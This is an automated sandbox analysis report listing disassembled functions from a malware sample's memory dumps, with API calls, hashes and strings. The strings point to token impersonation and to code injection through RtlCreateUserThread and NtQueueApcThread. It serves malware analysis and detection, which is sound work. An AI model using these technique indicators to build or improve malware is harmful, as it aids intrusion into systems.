                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$_callnewhmalloc$AllocHeap
                    • String ID:
                    • API String ID: 996410232-0
                    • Opcode ID: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                    • Instruction ID: fa91a802676de7115477e7ecbe885dc73ce57f5083dfd6623bbf0d32d29fbd00
                    • Opcode Fuzzy Hash: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                    • Instruction Fuzzy Hash: 2E31F032304B8546EB16DB6A980176B6B5BF795BC8F898034DD5ACB722EE38C946C300
                    Function 001A48F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 001A493A
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • malloc.LIBCMT ref: 001A4945
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                    • free.LIBCMT ref: 001A4A2C
                    • free.LIBCMT ref: 001A4A34
                    • free.LIBCMT ref: 001A4A40
                    • free.LIBCMT ref: 001A4A4D
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$_callnewhmalloc
                    • String ID:
                    • API String ID: 2761444284-0
                    • Opcode ID: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                    • Instruction ID: ddfe11bee21fe91fe2ede919e1d28a075b0ed0327b27eca2dde5050658343c14
                    • Opcode Fuzzy Hash: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                    • Instruction Fuzzy Hash: EA31D0263147D587DF15DB2AA4107AE6B99FBE6BC8F0A8024DD568B711EF78C807C304
                    Function 00672D70 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 94stringCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006731F4: strchr.LIBCMT ref: 0067322E
                      • Part of subcall function 006731F4: strchr.LIBCMT ref: 0067324C
                      • Part of subcall function 006731F4: malloc.LIBCMT ref: 00673264
                      • Part of subcall function 006731F4: malloc.LIBCMT ref: 00673271
                      • Part of subcall function 006731F4: rand.LIBCMT ref: 0067333D
                    • strchr.LIBCMT ref: 00672DD6
                    • _snprintf.LIBCMT ref: 00672E0C
                      • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                      • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                    • _snprintf.LIBCMT ref: 00672E23
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                    • String ID: %s&%s$?%s
                    • API String ID: 1095232423-1750478248
                    • Opcode ID: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                    • Instruction ID: 1fe48212a70a43d23a9b5d68317c628ddc730258e810a59962683c7a904eb9b7
                    • Opcode Fuzzy Hash: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                    • Instruction Fuzzy Hash: 92419262204E8191EA119F2ED1552E8A3B2FF98B99F089526DF8D57B20EF34D1B2C340
                    Function 0068AC98 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                    • String ID:
                    • API String ID: 2998201375-0
                    • Opcode ID: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                    • Instruction ID: 0be63cf8f76dd2de07813188870e01f120d0accea70a650f284de5b6bec00889
                    • Opcode Fuzzy Hash: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                    • Instruction Fuzzy Hash: 8631A03220578086EB60AF55E580769BB66FB85FD0F188326EF8997F65DB38C881C701
                    Function 001AF064 Relevance: 7.6, APIs: 5, Instructions: 58fileCOMMON
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 001AF085
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • free.LIBCMT ref: 001AF0C0
                    • fwrite.LIBCMT ref: 001AF101
                    • fclose.LIBCMT ref: 001AF109
                    • free.LIBCMT ref: 001AF116
                      • Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$free$_callnewhfclosefwritemalloc
                    • String ID:
                    • API String ID: 1696598829-0
                    • Opcode ID: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                    • Instruction ID: 596a8a54152f7891fa982c53a1485843f2f04b7ac0077e255192b694276bbb64
                    • Opcode Fuzzy Hash: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                    • Instruction Fuzzy Hash: E4118265704B4081DE10F762E5513AE6392EBA5BE4F484239FE6E4BB8ADF3CC5068740
                    Function 0068A5EC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 0068A5FD
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • __doserrno.LIBCMT ref: 0068A5F5
                      • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno_errno
                    • String ID:
                    • API String ID: 2964073243-0
                    • Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                    • Instruction ID: 9a5633fb553444a0838e3de5a66e580a6212c88d0cbfca2ea863417caaa9e619
                    • Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                    • Instruction Fuzzy Hash: 26F02BB270060445EF097FA4C8A136C72539F51B32FA98306D9390B3D5E77D44D38712
                    Function 001C99EC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 001C99FD
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • __doserrno.LIBCMT ref: 001C99F5
                      • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno_errno
                    • String ID:
                    • API String ID: 2964073243-0
                    • Opcode ID: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                    • Instruction ID: 85ea3803c73946272d53637bb4f04510df937969011ab4b487b9e71251e7dd7d
                    • Opcode Fuzzy Hash: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                    • Instruction Fuzzy Hash: 9CF0F672751A4484EF092B74C8967AC7251ABB6F32FA6830DD629073D2C77CC8618710
                    Function 001B5228 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116stringCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408
                    • strrchr.LIBCMT ref: 001B52ED
                    • _snprintf.LIBCMT ref: 001B539B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _snprintfmallocstrrchr
                    • String ID: Failed to impersonate token: %d$t permissions in process: %d
                    • API String ID: 3587327836-1492073275
                    • Opcode ID: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                    • Instruction ID: 352770fe634819318cdb85f5b69be49ea66c76f3b606d11a1e4ac64c4e353384
                    • Opcode Fuzzy Hash: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                    • Instruction Fuzzy Hash: 1B41B135704A8096DB14FB22B9147AF6792B79AFD4F488125EE5A4BB69DF3CC442C700
                    Function 00672818 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93sleeppipeCOMMON
                    Download Yara Rule
                    APIs
                    • CreatePipe.KERNEL32 ref: 006728A3
                    • GetStartupInfoA.KERNEL32 ref: 006728AD
                    • Sleep.KERNEL32 ref: 006728F4
                      • Part of subcall function 006748D8: GetTickCount.KERNEL32 ref: 006748F1
                      • Part of subcall function 006748D8: GetTickCount.KERNEL32 ref: 00674932
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTick$CreateInfoPipeSleepStartup
                    • String ID: h
                    • API String ID: 1809008225-2439710439
                    • Opcode ID: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                    • Instruction ID: 9dac431128a5d33a1cca976349f8c7763e936ef93a065078d3ae7311692ea35b
                    • Opcode Fuzzy Hash: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                    • Instruction Fuzzy Hash: CA419A32604B889AE750CF65E84078EB7B6F788798F504219EF9C53B68DF38D646CB40
                    Function 0067E1D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AccountInformationLookupToken_snprintf
                    • String ID: %s\%s
                    • API String ID: 2107350476-4073750446
                    • Opcode ID: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                    • Instruction ID: 76ff5fb1b92f255e071d72172c76c5275d98a87628965d455dad0b8e360381d6
                    • Opcode Fuzzy Hash: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                    • Instruction Fuzzy Hash: 2E213032204FC196EB24DF61E8547DA7369F788B88F448126EA8D57B18DF39C31AC740
                    Function 00687E20 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32 ref: 00688B8A
                    • __crtCapturePreviousContext.LIBCMT ref: 00688BA1
                    • __raise_securityfailure.LIBCMT ref: 00688C43
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CaptureContextFeaturePresentPreviousProcessor__crt__raise_securityfailure
                    • String ID: Pj
                    • API String ID: 2585579334-1109624870
                    • Opcode ID: fa3aebd98754aec5c2a36f7327a256f2afd717e403199b14b25e934204aebfe6
                    • Instruction ID: e072f98f297580da6a0260de77f9bdce81e2c4c5eefec8c9f79deadb00f27ec1
                    • Opcode Fuzzy Hash: fa3aebd98754aec5c2a36f7327a256f2afd717e403199b14b25e934204aebfe6
                    • Instruction Fuzzy Hash: 68210775704B4085EB50AB18F86135477AAF78A348F90022AEA8D577B1EF7FC865CB01
                    Function 00674224 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: RtlCreateUserThread$ntdll.dll
                    • API String ID: 1646373207-2935400652
                    • Opcode ID: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                    • Instruction ID: 412f3c1fad01ec40b37c44b9036fff2b84c8986c87c1a8c8b4a2999c95763c34
                    • Opcode Fuzzy Hash: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                    • Instruction Fuzzy Hash: BD016D32314B8192DB20CF11F894749B7A9FB88B80F998135EA9D43B14DF38C5A9C700
                    Function 00673C0C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: NtQueueApcThread$ntdll
                    • API String ID: 1646373207-1374908105
                    • Opcode ID: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                    • Instruction ID: f038d303a48577b73559bf0d1ae69cbde89ae8da4f8355f731266a35975aac91
                    • Opcode Fuzzy Hash: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                    • Instruction Fuzzy Hash: E601D125300B9292DB008F22F85435AB3A5FB89FD0F988625EF5C43B28DF38C5A68300
                    Function 00670C64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: IsWow64Process$kernel32
                    • API String ID: 1646373207-3789238822
                    • Opcode ID: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                    • Instruction ID: e2daee7cb0072110a92526451e8d9e6f4daa953fa947003dfc671c17928fab38
                    • Opcode Fuzzy Hash: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                    • Instruction Fuzzy Hash: ACE04FA172270292FE05CB55E8A47656366EB88B91F481010D94B4AB65EF3DC5A9C710
                    Function 006720E4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32
                    • API String ID: 1646373207-3900151262
                    • Opcode ID: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                    • Instruction ID: 3879d7efb5108f01c7375b1c336d0e57c507da3620a91ff4996a8e67f594b482
                    • Opcode Fuzzy Hash: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                    • Instruction Fuzzy Hash: 11D0A710752607A1FE089B91FC747A41356BB5AF40F4C1020891E0B720EE3DC1EDC350
                    Function 006720AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32
                    • API String ID: 1646373207-736604160
                    • Opcode ID: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                    • Instruction ID: 4cd60276b6661a869d07d975088d21ef58a001d1a22f5fda6036dc8d0c00d3b0
                    • Opcode Fuzzy Hash: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                    • Instruction Fuzzy Hash: FBD0A710712607A1FE049BD1FC747A46356AB49F40F4C1021881E0A720EE3DC1EAC350
                    Function 0067BFC0 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                    • Instruction ID: 6eaaa9ab1a844fe88417ef1eff5ff3034109cd015612bf2cdfcfbf95f85d5a18
                    • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                    • Instruction Fuzzy Hash: 0051BF32741640CAD714EF29E8853A833E2F769B64F24823DDA1A5B761CB3EC452CF91
                    Function 001BB3C0 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                    • Instruction ID: 9cd805be13f1b3885f796fd01702c1fa5e39bc59ddbb0bb5b327f8e09bdc8491
                    • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                    • Instruction Fuzzy Hash: D8519572605784CAE728CF19E9C57EC33A1F758B95F25412ADE1A4BBA1DB78C442CB80
                    Function 001B2170 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 001B25F4: strchr.LIBCMT ref: 001B262E
                      • Part of subcall function 001B25F4: strchr.LIBCMT ref: 001B264C
                      • Part of subcall function 001B25F4: malloc.LIBCMT ref: 001B2664
                      • Part of subcall function 001B25F4: malloc.LIBCMT ref: 001B2671
                      • Part of subcall function 001B25F4: rand.LIBCMT ref: 001B273D
                    • strchr.LIBCMT ref: 001B21D6
                    • _snprintf.LIBCMT ref: 001B220C
                      • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                      • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                    • _snprintf.LIBCMT ref: 001B2223
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                    • String ID: not create token: %d
                    • API String ID: 1095232423-2272930512
                    • Opcode ID: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                    • Instruction ID: dd83be3cdc38468e2d72b40f691b647392f28cd9c647279351a05b32f2482063
                    • Opcode Fuzzy Hash: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                    • Instruction Fuzzy Hash: 8441C066614EC091EA159F6ED1852E8B3B0FF98B95F085512DF8D67B20EF34D1B6C340
                    Function 00674A04 Relevance: 6.1, APIs: 4, Instructions: 80synchronizationCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 00674A45
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • htonl.WS2_32 ref: 00674A5B
                      • Part of subcall function 00674C44: PeekNamedPipe.KERNEL32 ref: 00674C7C
                    • WaitForSingleObject.KERNEL32 ref: 00674AB6
                    • free.LIBCMT ref: 00674AF2
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
                    • String ID:
                    • API String ID: 2495333179-0
                    • Opcode ID: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                    • Instruction ID: 4648d0429a6de1d140e44e85e96c72b2234793a88890e8b2bc710f0046024de4
                    • Opcode Fuzzy Hash: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                    • Instruction Fuzzy Hash: 2321E13670064086DB64EF62E54876A73ABFB89B98F09C518DE5D0B71CEF38C891C748
                    Function 0067C230 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _time64.LIBCMT ref: 0067C254
                      • Part of subcall function 0068145C: GetSystemTimeAsFileTime.KERNEL32 ref: 0068146A
                      • Part of subcall function 0068044C: _getptd.LIBCMT ref: 00680454
                    • malloc.LIBCMT ref: 0067C29C
                    • strtok.LIBCMT ref: 0067C300
                    • strtok.LIBCMT ref: 0067C311
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Timestrtok$FileSystem_getptd_time64malloc
                    • String ID:
                    • API String ID: 460628555-0
                    • Opcode ID: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                    • Instruction ID: 8085eb6fc398f76177e30c2a2fe397d02a9ce9bf3850a8c026e00e981c306913
                    • Opcode Fuzzy Hash: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                    • Instruction Fuzzy Hash: 042124B6600B9481DB40DF91E08866D37AAF788FE4B06822AEF2E47742CF30C542C784
                    Function 006610D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: clock
                    • String ID:
                    • API String ID: 3195780754-0
                    • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                    • Instruction ID: 24348d802dc2d1f08a0c155925a8388473e2b6d20b6d7e2de2e238697d943f74
                    • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                    • Instruction Fuzzy Hash: 04116632A04788599770EFA6A88156BF692FB8B3D0F1D0235EF944B705EA75CC82C740
                    Function 0068F5D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0068F5FC
                      • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                      • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                      • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                    • _errno.LIBCMT ref: 0068F608
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • _invalid_parameter_noinfo.LIBCMT ref: 0068F613
                    • strchr.LIBCMT ref: 0068F629
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                    • String ID:
                    • API String ID: 4151157258-0
                    • Opcode ID: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                    • Instruction ID: 57340b939f474d349f093d2e7be4e21bbf8914060297e7e2e26b8cd3160c6e13
                    • Opcode Fuzzy Hash: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                    • Instruction Fuzzy Hash: E21104626082E481CB207B25905027EB7A2E785FE4B1C8339FBD64BB65FA6CC4C3C710
                    Function 001CE9D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001CE9FC
                      • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                      • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                      • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                    • _errno.LIBCMT ref: 001CEA08
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • _invalid_parameter_noinfo.LIBCMT ref: 001CEA13
                    • strchr.LIBCMT ref: 001CEA29
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                    • String ID:
                    • API String ID: 4151157258-0
